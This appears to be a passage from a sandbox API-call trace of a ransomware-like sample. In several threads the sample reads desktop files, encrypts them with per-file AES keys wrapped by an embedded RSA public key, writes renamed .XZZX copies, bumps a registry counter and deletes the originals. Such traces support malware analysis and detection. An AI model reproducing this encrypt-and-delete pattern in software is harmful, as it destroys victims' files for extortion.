lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.456] SetErrorMode (uMode=0x1) returned 0x1 [0164.456] lstrcpyW (in: lpString1=0x2aaf860, lpString2="FzoKie.rtf" | out: lpString1="FzoKie.rtf") returned="FzoKie.rtf" [0164.456] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x6818582, Data2=0x21a4, Data3=0x4407, Data4=([0]=0x83, [1]=0x7, [2]=0xf8, [3]=0xe1, [4]=0xd, [5]=0xb7, [6]=0x14, [7]=0xa1))) returned 0x0 [0164.456] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FzoKie.rtf") returned 52 [0164.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0164.456] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DD2F494808F07B7C068185820B9B5FC4.XZZX") returned 79 [0164.456] StrStrW (lpFirst="FzoKie.rtf", lpSrch="XZZX") returned 0x0 [0164.456] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FzoKie.rtf", dwFileAttributes=0x20) returned 1 [0164.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FzoKie.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fzokie.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0164.457] ReadFile (in: hFile=0x1b4, lpBuffer=0x4383f60, nNumberOfBytesToRead=0xe77, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x4383f60*, lpNumberOfBytesRead=0x2aae418*=0xe77, lpOverlapped=0x0) returned 1 [0164.459] CloseHandle (hObject=0x1b4) returned 1 [0164.459] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0164.459] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0164.459] SetErrorMode (uMode=0x1) returned 0x1 [0164.459] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0164.459] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1a90) returned 1 [0164.462] CryptGenKey (in: hProv=0x3cc1a90, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372538) returned 1 [0164.880] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0164.880] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2aae41c | out: pbData=0x1c70000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0164.880] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.881] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0164.881] CryptDestroyKey (hKey=0x4372538) returned 1 [0164.881] CryptReleaseContext (hProv=0x3cc1b18, dwFlags=0x0) returned 1 [0164.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DD2F494808F07B7C068185820B9B5FC4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dd2f494808f07b7c068185820b9b5fc4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x970 [0164.881] WriteFile (in: hFile=0x970, lpBuffer=0x4383f60*, nNumberOfBytesToWrite=0xe77, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x4383f60*, lpNumberOfBytesWritten=0x2aae438*=0xe77, lpOverlapped=0x0) returned 1 [0164.882] SetFilePointer (in: hFile=0x970, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe77 [0164.882] WriteFile (in: hFile=0x970, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0164.882] SetFilePointer (in: hFile=0x970, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe7c [0164.882] WriteFile (in: hFile=0x970, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x14, lpOverlapped=0x0) returned 1 [0164.882] SetFilePointer (in: hFile=0x970, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe90 [0164.882] WriteFile (in: hFile=0x970, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0164.883] SetFilePointer (in: hFile=0x970, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe95 [0164.883] SetErrorMode (uMode=0x1) returned 0x1 [0164.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0164.883] OutputDebugStringW (lpOutputString="end") [0164.883] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0164.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0164.883] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x3cc1b18) returned 1 [0164.884] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1b18, dwCertEncodingType=0x1, pInfo=0x437e868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e898*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e8a0*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x4372538) returned 1 [0164.884] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.884] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0164.884] CryptEncrypt (in: hKey=0x4372538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0164.884] CryptEncrypt (in: hKey=0x4372538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1c28*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1c28*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0164.885] WriteFile (in: hFile=0x970, lpBuffer=0x3cc1c28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1c28*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0164.885] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0164.885] WriteFile (in: hFile=0x970, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0164.885] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0164.885] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0164.885] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0x974) returned 0x0 [0164.885] RegQueryValueExW (in: hKey=0x974, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0xe3, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0164.885] RegCloseKey (hKey=0x974) returned 0x0 [0164.885] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0x974) returned 0x0 [0164.885] RegSetValueExW (in: hKey=0x974, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0xe4, cbData=0x4 | out: lpData=0x2aadfec*=0xe4) returned 0x0 [0164.886] RegCloseKey (hKey=0x974) returned 0x0 [0164.886] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.886] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.886] CloseHandle (hObject=0x970) returned 1 [0164.886] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0164.887] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0164.887] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FzoKie.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fzokie.rtf")) returned 1 [0164.888] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FzoKie.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fzokie.rtf")) returned 0 Thread: id = 553 os_tid = 0x444 [0164.632] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.632] lstrcpyW (in: lpString1=0x29af460, lpString2="jkGAH7YstwIc6lZC9j.gif" | out: lpString1="jkGAH7YstwIc6lZC9j.gif") returned="jkGAH7YstwIc6lZC9j.gif" [0164.632] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.632] SetErrorMode (uMode=0x1) returned 0x1 [0164.633] lstrcpyW (in: lpString1=0x29af860, lpString2="jkGAH7YstwIc6lZC9j.gif" | out: lpString1="jkGAH7YstwIc6lZC9j.gif") returned="jkGAH7YstwIc6lZC9j.gif" [0164.633] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x57a2a452, Data2=0x71c5, Data3=0x4401, Data4=([0]=0x9d, [1]=0x5a, [2]=0x36, [3]=0x7f, [4]=0x33, [5]=0x85, [6]=0xa2, [7]=0x66))) returned 0x0 [0164.633] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkGAH7YstwIc6lZC9j.gif") returned 64 [0164.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0164.633] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX") returned 79 [0164.633] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="XZZX") returned 0x0 [0164.633] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkGAH7YstwIc6lZC9j.gif", dwFileAttributes=0x20) returned 1 [0164.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkGAH7YstwIc6lZC9j.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkgah7ystwic6lzc9j.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0164.633] ReadFile (in: hFile=0x230, lpBuffer=0x43a5e40, nNumberOfBytesToRead=0x28d9, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43a5e40*, lpNumberOfBytesRead=0x29ae418*=0x28d9, lpOverlapped=0x0) returned 1 [0164.634] CloseHandle (hObject=0x230) returned 1 [0164.634] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1cc0000 [0164.634] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cd0000 [0164.635] SetErrorMode (uMode=0x1) returned 0x1 [0164.635] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0164.635] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1b18) returned 1 [0164.637] CryptGenKey (in: hProv=0x3cc1b18, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43725b8) returned 1 [0164.852] CryptExportKey (in: hKey=0x43725b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0164.852] CryptExportKey (in: hKey=0x43725b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cd0000, pdwDataLen=0x29ae41c | out: pbData=0x1cd0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0164.852] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.853] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0164.853] CryptDestroyKey (hKey=0x43725b8) returned 1 [0164.853] CryptReleaseContext (hProv=0x3cc1b18, dwFlags=0x0) returned 1 [0164.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3ab0a51a1e38c5c557a2a45220d3aa0d.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x96c [0164.854] WriteFile (in: hFile=0x96c, lpBuffer=0x43a5e40*, nNumberOfBytesToWrite=0x28d9, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5e40*, lpNumberOfBytesWritten=0x29ae438*=0x28d9, lpOverlapped=0x0) returned 1 [0164.855] SetFilePointer (in: hFile=0x96c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x28d9 [0164.855] WriteFile (in: hFile=0x96c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.855] SetFilePointer (in: hFile=0x96c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x28de [0164.855] WriteFile (in: hFile=0x96c, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0164.855] SetFilePointer (in: hFile=0x96c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x290a [0164.855] WriteFile (in: hFile=0x96c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.855] SetFilePointer (in: hFile=0x96c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x290f [0164.855] SetErrorMode (uMode=0x1) returned 0x1 [0164.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0164.855] OutputDebugStringW (lpOutputString="end") [0164.856] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0164.856] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0164.856] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc1b18) returned 1 [0164.856] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1b18, dwCertEncodingType=0x1, pInfo=0x437e798*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e7c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e7d0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372738) returned 1 [0164.856] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.857] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0164.857] CryptEncrypt (in: hKey=0x4372738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0164.857] CryptEncrypt (in: hKey=0x4372738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1ba0*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1ba0*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0164.857] WriteFile (in: hFile=0x96c, lpBuffer=0x3cc1ba0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1ba0*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0164.857] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0164.857] WriteFile (in: hFile=0x96c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.857] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0165.116] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0165.116] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x1ac) returned 0x0 [0165.116] RegQueryValueExW (in: hKey=0x1ac, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xe4, lpcbData=0x29adfdc*=0x4) returned 0x0 [0165.116] RegCloseKey (hKey=0x1ac) returned 0x0 [0165.116] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x1ac) returned 0x0 [0165.116] RegSetValueExW (in: hKey=0x1ac, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xe5, cbData=0x4 | out: lpData=0x29adfec*=0xe5) returned 0x0 [0165.116] RegCloseKey (hKey=0x1ac) returned 0x0 [0165.116] VirtualFree (lpAddress=0x1cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.117] VirtualFree (lpAddress=0x1cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.117] CloseHandle (hObject=0x96c) returned 1 [0165.117] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0165.118] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0165.118] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkGAH7YstwIc6lZC9j.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkgah7ystwic6lzc9j.gif")) returned 1 [0165.119] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkGAH7YstwIc6lZC9j.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkgah7ystwic6lzc9j.gif")) returned 0 Thread: id = 554 os_tid = 0x890 [0164.889] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.889] lstrcpyW (in: 